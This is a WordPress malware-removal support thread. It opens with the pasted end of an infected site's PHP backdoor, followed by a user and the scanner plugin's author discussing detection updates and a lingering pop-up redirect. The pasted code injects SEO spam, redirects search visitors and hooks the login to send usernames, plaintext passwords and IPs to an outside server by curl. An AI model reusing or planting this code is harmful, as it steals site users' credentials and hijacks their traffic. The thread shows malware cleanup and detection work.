$my_content = preg_replace('#<div id="main-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content-area">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content-area">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="post-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="post-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="item-page">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="item-page">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="grid(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="grid(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="page(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="page(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="column(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="column(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="nextend-flux">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="nextend-flux">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<table(.*)>#iUs')) { $my_content = preg_replace('#<table(.*)>#iUs', "<table>\n<div>$txt</div>", $my_content, 1); } elseif (@preg_match('#<div class="inner-wrapper">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="inner-wrapper">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n<div>\n$txt\n</div>", $my_content, 1); } } } //end if key elseif (!preg_match('#<title>(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://karanbit.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?>here is a link to the .default file in filebin, i cannot attach it via email or to the post here
Have you happened upon any further information that may help?
I have added added this new threat to me definition updates. Please make sure that you have the latest definitions and run the Complete Scan again, and please let me know if there are any more threats that are not being found by my plugin so that I can add them too.
Greetings Eli
Thank you very much for your effort in removing this malware.
Unfortunately in my case it still does not register it, I am attaching the image of the scan result.
https://ibb.co/4dNtbz0Also, I tell you that a pop-up window still opens when you click on any of the links on my website. This is the address you load initially.
https://win-your-prize-now2.life/?u=mr1kd0x&o=f5pp7z3&t=pI remain attentive to any guide.
Again. thank you very much!
- The topic ‘rogueads.unwanted_ads 16’ is closed to new replies.
